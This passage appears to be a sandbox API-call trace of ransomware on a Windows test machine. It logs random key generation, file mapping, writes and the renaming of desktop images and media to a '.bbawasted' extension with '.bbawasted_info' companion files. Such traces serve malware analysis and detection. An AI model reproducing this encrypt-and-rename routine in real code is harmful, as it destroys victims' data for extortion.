dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.001] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.010] SetEndOfFile (hFile=0xf8) returned 1 [0070.012] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.012] CloseHandle (hObject=0xf8) returned 1 [0070.013] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.013] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.014] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.014] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\IDmyRfgE.bmp") returned 77 [0070.014] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a4) returned 0x5bf070 [0070.014] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.014] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0070.014] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.027] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0070.027] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\IDmyRfgE.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\idmyrfge.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.031] WriteFile (in: hFile=0xf8, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.032] SetEndOfFile (hFile=0xf8) returned 1 [0070.032] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.032] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.032] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\IDmyRfgE.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\idmyrfge.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\IDmyRfgE.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\idmyrfge.bmp.bbawasted")) returned 1 [0070.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\IDmyRfgE.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\idmyrfge.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.033] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0070.035] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.035] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.035] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.035] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.036] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.036] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.045] SetEndOfFile (hFile=0xf8) returned 1 [0070.078] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.078] CloseHandle (hObject=0xf8) returned 1 [0070.079] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.080] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5c8560) returned 1 [0070.080] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.080] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.080] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\6ZMlFvDrBeGhhz.m4a") returned 116 [0070.080] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2f2) returned 0x5c87c8 [0070.080] lstrcpyW (in: lpString1=0x5c88b0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.080] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.080] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5c8560) returned 1 [0070.081] CryptGenRandom (in: hProv=0x5c8560, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.081] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\6ZMlFvDrBeGhhz.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\6zmlfvdrbeghhz.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.082] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.082] SetEndOfFile (hFile=0xf8) returned 1 [0070.091] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.091] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.091] lstrcpyW (in: lpString1=0x5c88b0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\6ZMlFvDrBeGhhz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\6zmlfvdrbeghhz.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\6ZMlFvDrBeGhhz.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\6zmlfvdrbeghhz.m4a.bbawasted")) returned 1 [0070.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\6ZMlFvDrBeGhhz.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\6zmlfvdrbeghhz.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.092] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0070.094] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5c8560) returned 1 [0070.094] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0070.094] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.094] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5c8560) returned 1 [0070.095] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.095] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.103] SetEndOfFile (hFile=0xf8) returned 1 [0070.105] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.105] CloseHandle (hObject=0xf8) returned 1 [0070.107] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c87c8 | out: hHeap=0x580000) returned 1 [0070.107] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5c8560) returned 1 [0070.108] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.108] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.108] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\PA0FffKtoxkEcJRhu.swf") returned 119 [0070.108] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2f8) returned 0x5c87c8 [0070.108] lstrcpyW (in: lpString1=0x5c88b6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.108] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.108] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5c8560) returned 1 [0070.109] CryptGenRandom (in: hProv=0x5c8560, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.109] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\PA0FffKtoxkEcJRhu.swf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\pa0fffktoxkecjrhu.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.109] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.110] SetEndOfFile (hFile=0xf8) returned 1 [0070.110] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.111] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.111] lstrcpyW (in: lpString1=0x5c88b6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\PA0FffKtoxkEcJRhu.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\pa0fffktoxkecjrhu.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\PA0FffKtoxkEcJRhu.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\pa0fffktoxkecjrhu.swf.bbawasted")) returned 1 [0070.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\PA0FffKtoxkEcJRhu.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\pa0fffktoxkecjrhu.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.111] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.112] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5c8560) returned 1 [0070.113] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0070.113] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.113] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5c8560) returned 1 [0070.113] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.113] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.122] SetEndOfFile (hFile=0xf8) returned 1 [0070.124] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.124] CloseHandle (hObject=0xf8) returned 1 [0070.171] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c87c8 | out: hHeap=0x580000) returned 1 [0070.171] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.172] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.172] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\BdJNs8uPR9tdwxrXW1.jpg") returned 101 [0070.172] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2d4) returned 0x5c77b0 [0070.172] lstrcpyW (in: lpString1=0x5c787a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.172] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.172] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.173] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.173] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\BdJNs8uPR9tdwxrXW1.jpg.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\bdjns8upr9tdwxrxw1.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.173] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.174] SetEndOfFile (hFile=0x120) returned 1 [0070.174] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.174] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.174] lstrcpyW (in: lpString1=0x5c787a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\BdJNs8uPR9tdwxrXW1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\bdjns8upr9tdwxrxw1.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\BdJNs8uPR9tdwxrXW1.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\bdjns8upr9tdwxrxw1.jpg.bbawasted")) returned 1 [0070.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\BdJNs8uPR9tdwxrXW1.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\bdjns8upr9tdwxrxw1.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.175] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.175] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.176] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0070.176] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.176] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.177] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.177] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.185] SetEndOfFile (hFile=0x120) returned 1 [0070.187] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.187] CloseHandle (hObject=0x120) returned 1 [0070.189] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.189] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.190] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.190] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\dylo.jpg") returned 87 [0070.190] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b8) returned 0x5c77b0 [0070.190] lstrcpyW (in: lpString1=0x5c785e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.190] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.190] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.191] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.191] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\dylo.jpg.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\dylo.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.337] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.372] SetEndOfFile (hFile=0x120) returned 1 [0070.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.372] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.372] lstrcpyW (in: lpString1=0x5c785e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\dylo.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\dylo.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\dylo.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\dylo.jpg.bbawasted")) returned 1 [0070.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\dylo.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\dylo.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.373] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0070.374] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.375] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0070.375] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.375] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.376] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.376] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.384] SetEndOfFile (hFile=0x120) returned 1 [0070.386] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.386] CloseHandle (hObject=0x120) returned 1 [0070.388] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.388] 